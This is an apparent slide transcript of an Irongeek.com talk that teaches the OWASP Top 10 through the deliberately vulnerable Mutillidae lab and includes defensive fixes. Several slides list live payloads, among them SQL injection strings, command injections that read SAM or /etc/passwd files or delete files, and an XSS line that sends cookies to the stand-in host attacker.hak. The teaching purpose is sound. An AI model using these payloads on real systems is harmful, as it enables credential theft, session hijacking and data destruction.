Presentation is loading. Please wait.

Presentation is loading. Please wait.

Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m.

Published byAntony Morris Modified over 9 years ago

Similar presentations

Presentation on theme: "Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m."— Presentation transcript:

1 http://Irongeek.com Adrian Crenshaw

2 http://Irongeek.com  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m just a geek with time on my hands  I’m also not a professional web developer, creating crappy code was easy for me.  So why listen to me? Sometimes it takes a noob to teach a noob.

3 http://Irongeek.com  OWASP Top 10 http://www.owasp.org/index.php/OWASP_Top_Ten_Project As a side note, I’ve copied (Ligatted) quite of few of their descriptions and fixes into this presentation http://www.owasp.org/index.php/OWASP_Top_Ten_Project  Mutillidae http://www.irongeek.com/i.php?page=security/mutillidae- deliberately-vulnerable-php-owasp-top-10 http://www.irongeek.com/i.php?page=security/mutillidae- deliberately-vulnerable-php-owasp-top-10  Samurai WTF http://samurai.inguardians.com/ http://samurai.inguardians.com/  Ok, but what are those?

4 http://Irongeek.com The 2010 list includes:  A1: Injection  A2: Cross-Site Scripting (XSS)  A3: Broken Authentication and Session Management  A4: Insecure Direct Object References  A5: Cross-Site Request Forgery (CSRF)  A6: Security Misconfiguration  A7: Insecure Cryptographic Storage  A8: Failure to Restrict URL Access  A9: Insufficient Transport Layer Protection  A10: Unvalidated Redirects and Forwards The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.

5 http://Irongeek.com  A teaching tool for illustrating the OWASP 10  Written in PHP/MySQL  Meant to be simpler than WebGoat  Simple to exploit, just to get the concept across  Easy to reset  Includes a “Tips” function to help the student

6 http://Irongeek.com  Live CD meant to be a “Web Testing Framework”  Made by some guys at Inguardians Kevin Johnson Justin Searle Frank DiMaggio  If you want a more general network pentesting distro, look at Backtrack 4 http://www.backtrack-linux.org/ http://www.backtrack-linux.org/

7 http://Irongeek.com 1. Download Mutillidae http://www.irongeek.com/i.php?page=security/mutillidae- deliberately-vulnerable-php-owasp-top-10 http://www.irongeek.com/i.php?page=security/mutillidae- deliberately-vulnerable-php-owasp-top-10 2. Grab XAMPP Lite and install it http://www.apachefriends.org/en/xampp.htmlhttp://www.apachefriends.org/en/xampp.html 3. Put the Mutillidae files into a web accessible directory ( \htdocs on XAMPP) 4. May want to edit mutillidae/.htaccess to decide who can access it 5. Put your MySQL config information into mutillidae/config.inc

8 http://Irongeek.com  Lovely set of libraries to help implement fixes like proper escaping, parameterization and such. http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API  Supported platforms: Java 1.4.4 Java 2.0.NET Classic ASP PHP ColdFusion & CFML Python Javascript

9 http://Irongeek.com Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.

10 http://Irongeek.com The Code: “SELECT * FROM accounts WHERE username='". $username."' AND password='".stripslashes($password).”’” or echo shell_exec("nslookup ". $targethost);'“ Expected to fill in the string to: SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’ or Nslookup irongeek.com But what if the person injected: SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’ or 1=1 -- ’ or Nslookup irongeek.com && del *.*

11 http://Irongeek.com  Simple SQL Injection: ' or 1=1 --  Wish I could do this, but can't stack in MySQL/PHP '; DROP TABLE owasp10; --  Command Injections (for Windows): && dir && wmic process list && wmic useraccount list && copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak  Command Injections (for *nix): ;ls ;whoami ;cat /etc/passwd ;nmap –A target.hak

12 http://Irongeek.com  SQL Injection Cheat Sheet http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/  SQL Injection Attacks by Example http://unixwiz.net/techtips/sql-injection.html http://unixwiz.net/techtips/sql-injection.html  Command line Kung Fu http://blog.commandlinekungfu.com/ http://blog.commandlinekungfu.com/

13 http://Irongeek.com  Input validation.  Use strongly typed parameterized query APIs (bound parameters).  Enforce least privilege.  Avoid detailed error messages.  Show care when using stored procedures.  Do not use dynamic query interfaces.  Do not use simple escaping functions.  Watch out for canonicalization errors.

14 http://Irongeek.com XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.

15 http://Irongeek.com  Simple: alert("XSS");  Page Redirect: window.location = "http://www.irongeek.com/"  Cookie Stealing: new Image().src="http://attacker.hak/mutillidae/catch.php?cooki e="+encodeURI(document.cookie);

16 http://Irongeek.com  Simple: alert("XSS");  Page Redirect: window.location = "http://www.irongeek.com/"  Cookie Stealing: new Image().src="http://attacker.hak/mutillidae/ccatch.php?cookie="+encodeURI(document.cookie);  Password Con: username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write(" ");

17 http://Irongeek.com  External Javascript:  Hot BeEF Injection:  How about the User Agent string?

18 http://Irongeek.com  Mangle XSS to bypass filters: http://ha.ckers.org/xss.html http://ha.ckers.org/xss.html  BeEF browser exploitation framework http://www.bindshell.net/tools/beefhttp://www.bindshell.net/tools/beef  XSS Me Firefox plugin https://addons.mozilla.org/en-US/firefox/addon/7598 https://addons.mozilla.org/en-US/firefox/addon/7598  Exotic Injection Vectors http://www.irongeek.com/i.php?page=security/xss-sql-and- command-inject-vectors http://www.irongeek.com/i.php?page=security/xss-sql-and- command-inject-vectors

19 http://Irongeek.com  Input validation.  Strong output encoding. htmlspecialchars()  Specify the output encoding.  Do not use "blacklist" validation to detect XSS in input or to encode output.  Watch out for canonicalization errors.

20 http://Irongeek.com Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.

21 http://Irongeek.com  This can be very application specific  For Mutillidae: Let’s Edit A Cookie!

22 http://Irongeek.com  Edit Cookies Plugin https://addons.mozilla.org/en-US/firefox/addon/4510 https://addons.mozilla.org/en-US/firefox/addon/4510  Tamper Data Firefox Plugin https://addons.mozilla.org/en-US/firefox/addon/966 https://addons.mozilla.org/en-US/firefox/addon/966

23 http://Irongeek.com  The primary assets to protect are credentials and session IDs.  1. Are credentials always protected when stored using hashing or encryption? See A7.  2. Can credentials be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs)?  3. Are session IDs exposed in the URL (e.g., URL rewriting)?  4. Are session IDs vulnerable to session fixation attacks?  5. Do session IDs timeout and can users log out?  6. Are session IDs rotated after successful login?  7. Are passwords, session IDs, and other credentials sent only over TLS connections?

24 http://Irongeek.com The primary recommendation for an organization is to make available to developers: 1.A single set of strong authentication and session management controls. Such controls should strive to: a) meet all the authentication and session management requirements defined in OWASP’s Application Security Verification Standard(ASVS) areas V2 (Authentication) and V3 (Session Management). b) have a simple interface for developers. Consider the ESAPI Authenticator and User APIsas good examples to emulate, use, or build upon. 2. Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs.

25 http://Irongeek.com A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.

26 http://Irongeek.com  In the old version, you would have already seen it with the malicious file include demo. This time, let got look at the: Source viewer and in case you think POST will save you Text file viewer

27 http://Irongeek.com  Avoid exposing your private object references to users whenever possible, such as primary keys or filenames.  Validate any private object references extensively with an "accept known good" approach.  Verify authorization to all referenced objects.

28 http://Irongeek.com A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.

29 http://Irongeek.com Target Web App Client Website the attacker controls 1 1.Session established with web app via a cookie. (already logged in) 2.At some later point, content that the attacker controls is requested. 3.Attacker serves up content that asks client’s browser to make a request. 4.Client makes request, and since it already has a session cookie the request is honored. 2 3 4

30 http://Irongeek.com  Let’s visit a page with this lovely link:  Don’t want to use a bad image? Try an iframe:  Can’t use the GET method? Try something like: document.csrfform.submit()

31 http://Irongeek.com  CSRF Flaws Found On Major Websites, Including a Bank http://it.slashdot.org/article.pl?sid=08/09/30/0136219 http://it.slashdot.org/article.pl?sid=08/09/30/0136219  CSRF Home Router Fun http://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g- adsl-gateway-with-speedbooster-wag54gs/ http://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g- adsl-gateway-with-speedbooster-wag54gs/  CSRF in Gmail http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/ http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/

32 http://Irongeek.com  For sensitive data or value transactions, re-authenticate or use transaction signing to ensure that the request is genuine.  Do not use GET requests (URLs) for sensitive data or to perform value transactions. (see next point)  POST alone is insufficient protection.  Consider adding Captchas and extra sessions values as hidden form elements.

33 http://Irongeek.com  Deliberately Insecure Web Applications For Learning Web App Security http://www.irongeek.com/i.php?page=security/deli berately-insecure-web-applications-for-learning- web-app-security http://www.irongeek.com/i.php?page=security/deli berately-insecure-web-applications-for-learning- web-app-security

34 http://Irongeek.com  SamuraiWTF http://samurai.inguardians.com/ http://samurai.inguardians.com/  OWASP Live CD http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project  BackTrack http://www.remote-exploit.org/backtrack.html http://www.remote-exploit.org/backtrack.html  ESAPI (OWASP Enterprise Security API) http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API

35 http://Irongeek.com  Free ISSA classes  ISSA Meeting http://issa-kentuckiana.org/ http://issa-kentuckiana.org/  Louisville Infosec http://www.louisvilleinfosec.com/ http://www.louisvilleinfosec.com/  Phreaknic/Notacon/Outerz0ne http://phreaknic.info http://notacon.org/ http://www.outerz0ne.org/ http://phreaknic.info http://notacon.org/ http://www.outerz0ne.org/

36 http://Irongeek.com 42

Download ppt "Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m."

Similar presentations

Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
OWASP Web Vulnerabilities and Auditing

OWASP Web Vulnerabilities and Auditing
Don’t get Stung (An introduction to the OWASP Top Ten Project) Barry Dorrans Microsoft Information Security Tools NEW AND IMPROVED!

Don’t get Stung (An introduction to the OWASP Top Ten Project) Barry Dorrans Microsoft Information Security Tools NEW AND IMPROVED!
SEC835 OWASP Top Ten Project.

SEC835 OWASP Top Ten Project.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m.

Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
Attacking Authentication and Authorization CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University

Attacking Authentication and Authorization CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
Copyright © 2004 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.

Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.
1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.

1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Security and Risk Management. Who Am I Matthew Strahan from Content Security Principal Security Consultant I look young, but I’ve been doing this for.

Security and Risk Management. Who Am I Matthew Strahan from Content Security Principal Security Consultant I look young, but I’ve been doing this for.

Similar presentations

Ads by Google